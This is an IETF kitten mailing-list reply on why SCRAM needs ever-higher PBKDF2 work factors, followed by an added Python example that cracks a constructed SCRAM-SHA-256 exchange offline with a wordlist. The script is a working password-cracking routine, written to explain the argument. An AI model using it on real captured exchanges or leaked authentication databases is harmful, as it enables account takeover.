Re: [kitten] [EXTERNAL] Re: Windows Intent to revive and implement IAKerb draft-ietf-kitten-iakerb-03

Nico Williams <nico@cryptonector.com> Mon, 20 February 2023 00:21 UTC

Date: Sun, 19 Feb 2023 18:21:17 -0600
From: Nico Williams <nico@cryptonector.com>
To: Paul Romero <paulr@rcom-software.com>
Cc: kitten@ietf.org
Message-ID: <Y/K8/XnSgbPfnTm9@gmail.com>
References: <MW4PR21MB1970A9D254B943A1763C55FF9CA09@MW4PR21MB1970.namprd21.prod.outlook.com> <de4cbe7b-85b5-7001-3a8c-74787990c6e0@secure-endpoints.com> <eb9fa7a4-a00d-f388-27aa-3624df8ce4f2@secure-endpoints.com> <MW4PR21MB197060FB388E7922FAADEB079CA19@MW4PR21MB1970.namprd21.prod.outlook.com> <6cb6f5ddfc7b9b150b4eef72db5a3f3b9566fd80.camel@redhat.com> <20230219194355.36139173DDE@pb-smtp2.pobox.com> <Y/K2IEhX6c+b05Ye@gmail.com> <87b6479d-63d7-b31a-d2e2-b7bd6f9a9c65@rcom-software.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <87b6479d-63d7-b31a-d2e2-b7bd6f9a9c65@rcom-software.com>
Archived-At: <https://mailarchive.ietf.org/arch/msg/kitten/Pcra5fi1Obe0XY1NFp_Aax1FqFc>
Subject: Re: [kitten] [EXTERNAL] Re: Windows Intent to revive and implement IAKerb draft-ietf-kitten-iakerb-03

On Sun, Feb 19, 2023 at 04:04:29PM -0800, Paul Romero wrote:
> I don't agree that SCRAM is obsolete and am curious why
> you think that is the case. I've used it quite a while and
> never experienced a security breach.  The only problem
> I have come up against is the configuration of the end to end
> secret.

Because it requires constantly increasing the work factor that keeps
offline dictionary attacks from being reasonable.  As clouds get faster,
more accessible, and (maybe) cheaper, the PBKDF work factor parameters
that protect protocols like SCRAM (and Kerberos' non-PAKE password-based
pre-auth methods) have to keep increasing.

A PAKE would be better, naturally, but either way password-based
mechanisms don't scale to large networks unless they are only used at
authentication servers that trade proof of password knowledge for other
temporary credentials.

Nico
--
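The cost model Nico is describing, shown concretely as an added example that is not code from this thread or from any SCRAM implementation: a passive observer records one SCRAM-SHA-256 login (salt and iteration count from server-first, the client proof from client-final), then replays the RFC 5802 / RFC 7677 client-side derivation against a wordlist. The exchange below is constructed for the example (user alice, password hunter2, a fixed salt and fixed nonces are all made up here); the derivation itself follows the RFCs.

```python
"""Offline dictionary attack against a captured SCRAM-SHA-256 exchange.

Added example; not code from the original message or from any SCRAM
implementation.  It replays the client-side derivation of RFC 5802 / RFC 7677
against a constructed (not captured) exchange to show that SCRAM's safety
against a passive observer rests on the PBKDF2 iteration count alone.
"""
import base64
import hashlib
import hmac
import time
from typing import Optional

HASH = "sha256"

# Constructed sample standing in for a sniffed exchange.  Everything below
# except PASSWORD is visible on the wire: salt and iteration count travel in
# server-first, the proof in client-final.
PASSWORD = "hunter2"
SALT = bytes.fromhex("00112233445566778899aabbccddeeff")
ITERATIONS = 4096            # RFC 7677: SHOULD be at least 4096
CLIENT_NONCE = "fyko+d2lbbFgONRv9qkxdawL"
SERVER_NONCE = CLIENT_NONCE + "3rfcNHYJY1ZVvWVs7j"


def scram_keys(password: str, salt: bytes, iterations: int):
    """RFC 5802 section 3: SaltedPassword -> ClientKey, StoredKey, ServerKey."""
    salted = hashlib.pbkdf2_hmac(HASH, password.encode("utf-8"), salt, iterations)
    client_key = hmac.new(salted, b"Client Key", HASH).digest()
    stored_key = hashlib.sha256(client_key).digest()
    server_key = hmac.new(salted, b"Server Key", HASH).digest()
    return client_key, stored_key, server_key


def client_proof(password: str, salt: bytes, iterations: int, auth_message: bytes) -> bytes:
    """ClientProof = ClientKey XOR HMAC(StoredKey, AuthMessage)."""
    client_key, stored_key, _ = scram_keys(password, salt, iterations)
    client_sig = hmac.new(stored_key, auth_message, HASH).digest()
    return bytes(a ^ b for a, b in zip(client_key, client_sig))


def build_capture(password: str = PASSWORD, salt: bytes = SALT,
                  iterations: int = ITERATIONS) -> dict:
    """What a passive observer records from one successful SCRAM login."""
    client_first_bare = f"n=alice,r={CLIENT_NONCE}".encode()
    server_first = (f"r={SERVER_NONCE},s={base64.b64encode(salt).decode()},"
                    f"i={iterations}").encode()
    client_final_wo_proof = f"c=biws,r={SERVER_NONCE}".encode()   # c=biws: no channel binding
    auth_message = b",".join([client_first_bare, server_first, client_final_wo_proof])
    return {
        "salt": salt,
        "iterations": iterations,
        "auth_message": auth_message,
        "proof": client_proof(password, salt, iterations, auth_message),
    }


def verify_candidate(candidate: str, capture: dict) -> bool:
    """Test one guess entirely offline: recompute the proof and compare.

    No server round trip, no lockout, no rate limit; the cost of a guess is
    exactly one PBKDF2 run at the iteration count the server advertised.
    """
    guess = client_proof(candidate, capture["salt"], capture["iterations"],
                         capture["auth_message"])
    return guess == capture["proof"]


def offline_dictionary_attack(capture: dict, wordlist) -> Optional[str]:
    """Return the first password in wordlist that reproduces the captured proof."""
    for word in wordlist:
        if verify_candidate(word, capture):
            return word
    return None


def seconds_per_guess(iterations: int, trials: int = 5) -> float:
    """Wall-clock cost of one guess at a given work factor on this machine."""
    start = time.perf_counter()
    for _ in range(trials):
        hashlib.pbkdf2_hmac(HASH, b"guess", SALT, iterations)
    return (time.perf_counter() - start) / trials


if __name__ == "__main__":
    capture = build_capture()
    wordlist = ["password", "letmein", "123456", "hunter2", "correct horse"]
    print("recovered:", offline_dictionary_attack(capture, wordlist))
    # The defender's only lever is the iteration count: cost per guess grows
    # linearly with it, while attacker throughput grows with whatever hardware
    # they can rent, so the number has to keep climbing just to stand still.
    for i in (4096, 65536):
        print(f"i={i:6d}: {seconds_per_guess(i) * 1e3:.2f} ms per guess")
```

Two caveats worth keeping in mind when reading the output. First, the same per-guess cost applies to a leaked server database: StoredKey is H(ClientKey), derived from the same PBKDF2 output, so a stolen authentication database is attacked exactly the way the captured proof is here. Second, channel binding (the `c=` field) ties the exchange to a TLS session and defeats relaying, but does nothing against an observer who only wants to grind the password offline.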